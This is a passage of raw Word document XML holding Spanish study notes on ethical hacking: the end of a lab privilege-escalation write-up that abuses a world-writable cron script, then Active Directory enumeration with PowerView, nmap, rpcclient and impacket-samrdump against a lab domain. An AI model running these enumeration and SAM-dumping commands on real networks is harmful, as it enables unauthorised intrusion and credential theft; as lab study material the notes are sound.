                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="641985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="200AF130" w14:textId="06AAD9D7" w:rsidR="00CC72A4" w:rsidRDefault="00CC72A4" w:rsidP="003A3BF7">
      <w:r>
        <w:t>Tratamos de modificar la tarea cron:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6373B93D" w14:textId="4F9481D0" w:rsidR="00CC72A4" w:rsidRDefault="00CC72A4" w:rsidP="009B1ED1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC72A4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F44F8BC" wp14:editId="6406F48C">
            <wp:extent cx="4244708" cy="922100"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="20607425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742541" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4244708" cy="922100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E52075" w14:textId="7AB30D9E" w:rsidR="00CC72A4" w:rsidRDefault="00CC72A4" w:rsidP="003A3BF7">
      <w:r>
        <w:t>Para encontrar el script usamos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421E5D89" w14:textId="42110697" w:rsidR="00CC72A4" w:rsidRPr="00CC72A4" w:rsidRDefault="00CC72A4" w:rsidP="003A3BF7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC72A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>find . -name “cleaner.py”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2236B6EF" w14:textId="46FB8103" w:rsidR="00CC72A4" w:rsidRDefault="00CC72A4" w:rsidP="009B1ED1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC72A4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="599599F5" wp14:editId="5B4025EB">
            <wp:extent cx="1585097" cy="251482"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16331515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151526" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1585097" cy="251482"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3991255C" w14:textId="77777777" w:rsidR="00CC72A4" w:rsidRDefault="00CC72A4" w:rsidP="003A3BF7"/>
    <w:p w14:paraId="53D70105" w14:textId="717B57D3" w:rsidR="00CC72A4" w:rsidRDefault="00CC72A4" w:rsidP="003A3BF7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Y vemos que ejecuta el siguiente script en python:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7136DABA" w14:textId="79E09E29" w:rsidR="00CC72A4" w:rsidRDefault="00CC72A4" w:rsidP="003A3BF7">
      <w:r w:rsidRPr="00CC72A4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2091B420" wp14:editId="35873A69">
            <wp:extent cx="5400040" cy="963295"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="10429764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976443" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="963295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39207C09" w14:textId="5F787701" w:rsidR="00CC72A4" w:rsidRDefault="009B1ED1" w:rsidP="003A3BF7">
      <w:r>
        <w:t>Coomo vemos, el archivo pertenece a root, pero TODOS pueden escribir en él, así que modificamos para que podamos entrar en /root y coger nuestra bandera</w:t>
      </w:r>
      <w:r w:rsidR="00CC72A4">
        <w:t>, simplemente podemos hacernos superusuario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7A5414" w14:textId="616BE501" w:rsidR="009B1ED1" w:rsidRDefault="009B1ED1" w:rsidP="009B1ED1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009B1ED1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="033D4AE8" wp14:editId="616F5D34">
            <wp:extent cx="3673158" cy="312447"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="19251545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54572" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3673158" cy="312447"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FB986B" w14:textId="77777777" w:rsidR="009B1ED1" w:rsidRDefault="009B1ED1" w:rsidP="003A3BF7"/>
    <w:p w14:paraId="4530856C" w14:textId="2F9D1D63" w:rsidR="00CC72A4" w:rsidRDefault="009B1ED1" w:rsidP="009B1ED1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009B1ED1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0373B074" wp14:editId="08450C24">
            <wp:extent cx="2339543" cy="1143099"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="50360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6059" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2339543" cy="1143099"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="397D1F07" w14:textId="101C3500" w:rsidR="00D232EB" w:rsidRDefault="00D232EB" w:rsidP="00D232EB"/>
    <w:p w14:paraId="2529F23B" w14:textId="44342D4E" w:rsidR="00D232EB" w:rsidRDefault="00D232EB">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAD0AC2" w14:textId="4F6082AA" w:rsidR="00D232EB" w:rsidRDefault="003F6F21" w:rsidP="00D232EB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Hacking Ético en Active Directory</w:t>
      </w:r>
      <w:r w:rsidR="00D232EB" w:rsidRPr="003A3BF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E58BF3B" w14:textId="01C577D0" w:rsidR="00D232EB" w:rsidRDefault="008F2CDF" w:rsidP="00D232EB">
      <w:r>
        <w:t>Lo que nos interesa recopilar en un entorno de AD es:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F922522" w14:textId="48732DE4" w:rsidR="008F2CDF" w:rsidRDefault="008F2CDF" w:rsidP="00D232EB">
      <w:r>
        <w:t>Usuarios y cuentas locales, Grupos Locales, Equipos en el dominio, GPOs, ACLs, Relaciones de confianza entre Bosques y Dominios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B4611E" w14:textId="41FF6EFF" w:rsidR="008F2CDF" w:rsidRDefault="008F2CDF" w:rsidP="00D232EB">
      <w:r>
        <w:t>La Base de datos SAM (Security Account Manager): Almacena información sobre usuarios, grupos, contraseñas... del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F51F9BC" w14:textId="51DBA4D2" w:rsidR="008F2CDF" w:rsidRDefault="008F2CDF" w:rsidP="00D232EB">
      <w:r>
        <w:t>La base de datos SAM se comprueba por el LSA (Local Security Authority) que se encarga de autenticar el acceso de los usuarios al sistema local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724EF3FD" w14:textId="7A05B258" w:rsidR="008F2CDF" w:rsidRDefault="008F2CDF" w:rsidP="00D232EB">
      <w:r>
        <w:t>Esto se puede recopilar de forma local y remota. A partir de Windows 10 1607 y Windows Server 2016 esta información solo la puede obtener un administrador del sistema. En versiones anteriores, cualquier usuario podía enumerarla.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553DEAE0" w14:textId="2F0BD5EC" w:rsidR="008F2CDF" w:rsidRDefault="008F2CDF" w:rsidP="00D232EB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F2CDF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nos interesaremos principalmente en LDAP, que es un protocolo de aplicación que permite interactual con servi</w:t>
      </w:r>
      <w:r w:rsidR="001378C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="008F2CDF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ios de directorio como (AD). Cualquier usuario de dominio puede consultar NTDS.dt utilizando LDAP, independientemente de sus privilegios (por supuesto, no todos tienen los mismos permisos).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360FA8FA" w14:textId="6D0C2EDF" w:rsidR="00EC1DAF" w:rsidRDefault="008F2CDF" w:rsidP="00D232EB">
      <w:r>
        <w:t>Esto no se puede configurar de ninguna forma, ya que los usuarios deben hacer querys, como autenticación o logon. Esto es una gran ventaja para los atacantes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF193A6" w14:textId="1601DFD3" w:rsidR="00DE551B" w:rsidRDefault="00DE551B" w:rsidP="00791CE7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFC000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC1DAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>Recopilación Local de SAM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7DCD20" w14:textId="77777777" w:rsidR="00EC1DAF" w:rsidRDefault="00EC1DAF" w:rsidP="00EC1DAF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F8535A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>PowerView:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E56E72">
        <w:t xml:space="preserve">Script configurado para </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Powershell que podemos descargar desde </w:t>
      </w:r>
      <w:r w:rsidRPr="00791CE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>github.com/PowerShellMafia/PowerSploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673308E2" w14:textId="77777777" w:rsidR="00EC1DAF" w:rsidRDefault="00EC1DAF" w:rsidP="00EC1DAF">
      <w:r>
        <w:t>En la última actulización es necesario quitar los comentarios del script con:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE8B226" w14:textId="77777777" w:rsidR="00EC1DAF" w:rsidRDefault="00EC1DAF" w:rsidP="00EC1DAF">
      <w:r w:rsidRPr="00DE551B">
        <w:t>sed '/&lt;#/,/#&gt;/d' PowerView.ps1 &gt; new_powerview.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F462C3" w14:textId="44349187" w:rsidR="00EC1DAF" w:rsidRPr="00EC1DAF" w:rsidRDefault="00EC1DAF" w:rsidP="00791CE7">
      <w:r>
        <w:t>Luego, ya estará listo para que lo ejecute la máquina Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138FFA20" w14:textId="273A6854" w:rsidR="00DE551B" w:rsidRDefault="00DE551B" w:rsidP="00791CE7">
      <w:r>
        <w:t>Una vez hemos ejecutado PowerView, podemos usar los siguientes comandos para recopilar información:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C12015" w14:textId="049CA912" w:rsidR="00DE551B" w:rsidRDefault="00DE551B" w:rsidP="00292C8D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00292C8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-NetLocalGroup:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Muestra todos los grupos locales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090EDD14" w14:textId="711A4EAC" w:rsidR="00DE551B" w:rsidRPr="00DE551B" w:rsidRDefault="00DE551B" w:rsidP="00292C8D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00292C8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Get-NetLocalGroupMember -GroupName “Administradores” | select MemberName, IsGroup, IsDomain : </w:t>
      </w:r>
      <w:r>
        <w:t>Muestra qué usuarios pertenecen al grupo Administradores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5BDA8F" w14:textId="1949102D" w:rsidR="00DE551B" w:rsidRDefault="00DE551B" w:rsidP="00791CE7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE551B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75891A45" wp14:editId="272A5166">
            <wp:extent cx="5400040" cy="1042035"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="14378903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90351" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1042035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5219D198" w14:textId="55FDE673" w:rsidR="00EC1DAF" w:rsidRDefault="00DE551B" w:rsidP="00EC1DAF">
      <w:r w:rsidRPr="00DE551B">
        <w:t>En realidad esto se puede hacer sin necesidad de PowerView, pero solo de la máquina local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B09E75E" w14:textId="00AA8FCB" w:rsidR="00DE551B" w:rsidRPr="00EC1DAF" w:rsidRDefault="00EC1DAF" w:rsidP="00EC1DAF">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2A6E4C" w14:textId="4F37519A" w:rsidR="00DE551B" w:rsidRPr="00EC1DAF" w:rsidRDefault="00DE551B" w:rsidP="00DE551B">
      <w:r w:rsidRPr="00DE551B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Recopilación Remota de SAM:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC1DAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC1DAF" w:rsidRPr="00EC1DAF">
        <w:t>Solo es interesante si tenemos el loggin de un Administrador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3BFABC" w14:textId="458038DE" w:rsidR="00292C8D" w:rsidRPr="00292C8D" w:rsidRDefault="00292C8D" w:rsidP="00DE551B">
      <w:r w:rsidRPr="00292C8D">
        <w:t>Algunos comando para powershell son:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63128506" w14:textId="5FC231CB" w:rsidR="00292C8D" w:rsidRPr="00292C8D" w:rsidRDefault="00292C8D" w:rsidP="00292C8D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00292C8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Get-NetLoggedOn: </w:t>
      </w:r>
      <w:r w:rsidRPr="00292C8D">
        <w:t>Ver los usuarios loggeados en la red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FD26BE" w14:textId="571B207A" w:rsidR="00292C8D" w:rsidRDefault="00292C8D" w:rsidP="00292C8D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00292C8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">-NetSession: </w:t>
      </w:r>
      <w:r w:rsidRPr="00292C8D">
        <w:t>Ver qué conexiones en red se han hecho a mi máquina local</w:t>
      </w:r>
      <w:r>
        <w:t>, o al menos, que se hayan intentado, de ahí podemos intentar averiguar qué usuarios son administrador, para centrar nuestros esfuerzos en comprometer esa máquina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A7ABB0" w14:textId="1E5262D7" w:rsidR="00292C8D" w:rsidRDefault="005E3F48" w:rsidP="005E3F48">
      <w:r w:rsidRPr="005E3F48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Impacket y Rcclient:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="005E3F48">
        <w:t>Es posible que consigamos alguna credencial de alguna máquina cunado estemos haciendo una Auditoría Externa pero que no nos consigamos loggear con ella.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Para enumear la SAM de manera remota usando Kali Linux. El primer paso es configurar el DNS como el dominio de la infraestructura:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A6A041" w14:textId="63425303" w:rsidR="005E3F48" w:rsidRDefault="005E3F48" w:rsidP="005E3F48">
      <w:r w:rsidRPr="005E3F48">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="406C69F9" wp14:editId="1A2A4914">
            <wp:extent cx="5319221" cy="4130398"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="10104983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498338" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5319221" cy="4130398"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="027796A0" w14:textId="670C3E26" w:rsidR="005E3F48" w:rsidRDefault="00FD5D5F" w:rsidP="005E3F48">
      <w:r>
        <w:t>¿Como sabemos la IP del controlador del Dominio?:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B092CB7" w14:textId="321633FC" w:rsidR="00FD5D5F" w:rsidRPr="00FD5D5F" w:rsidRDefault="00FD5D5F" w:rsidP="005E3F48">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD5D5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo nmap -sS -n 192.168.20.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D50DAF" w14:textId="5B3D016E" w:rsidR="00FD5D5F" w:rsidRDefault="00FD5D5F" w:rsidP="005E3F48">
      <w:r>
        <w:t>El DC tendrá muchos puertos abiertos, como ldap, kerbero-sec...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6CBB57" w14:textId="7CFF3701" w:rsidR="00FD5D5F" w:rsidRDefault="00FD5D5F" w:rsidP="005E3F48">
      <w:r>
        <w:t xml:space="preserve">Podemos hacer uso de </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1DAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Rpcclient</w:t>
      </w:r>
      <w:r>
        <w:t>, es una utilidad para linux que tiene implementado los protocolos RPC de Windows para poder comunicarse:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DEB4DC" w14:textId="68373BAD" w:rsidR="00FD5D5F" w:rsidRPr="00C011B0" w:rsidRDefault="00C011B0" w:rsidP="005E3F48">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C011B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rpcclient -U “corp\empleado1%Passw0rd1” WS01.corp.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F94B6B" w14:textId="6183B7BD" w:rsidR="00C011B0" w:rsidRDefault="00C011B0" w:rsidP="005E3F48">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C011B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rpcclient -U “dominio\usuario%constraseña” (equipo en el que queremos loggearnos)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152CBF1B" w14:textId="022B5F98" w:rsidR="00C011B0" w:rsidRDefault="00917194" w:rsidP="00917194">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00917194">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A6DC2BC" wp14:editId="2FD464CA">
            <wp:extent cx="3711262" cy="396274"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="3859810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981074" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3711262" cy="396274"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FF0543" w14:textId="0245ACBB" w:rsidR="00917194" w:rsidRDefault="00EC1DAF" w:rsidP="00917194">
      <w:r w:rsidRPr="00EC1DAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Impacket</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> por su parte, también puede realizar un dump del SAM con:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46002394" w14:textId="7198D0D8" w:rsidR="00EC1DAF" w:rsidRPr="00EC1DAF" w:rsidRDefault="00EC1DAF" w:rsidP="00917194">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC1DAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impacket-samrdump corp/empleado1:Passw0rd2@WS01.corp.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E90EF46" w14:textId="2B316BA8" w:rsidR="00EC1DAF" w:rsidRDefault="00EC1DAF" w:rsidP="00917194">
      <w:r>
        <w:t>Claro esto solo funciona si el usuario tiene permiso de administrador. Con impacket netview se queda escuchando las conexiones a ese equipo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528E4DAF" w14:textId="564AE2C4" w:rsidR="00EC1DAF" w:rsidRDefault="00EC1DAF" w:rsidP="00EC1DAF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC1DAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impacket-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>netview</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1DAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> corp/empleado1:Passw0rd2@WS01.corp.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EA603C" w14:textId="677A87E8" w:rsidR="004471E6" w:rsidRDefault="004471E6" w:rsidP="00EC1DAF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
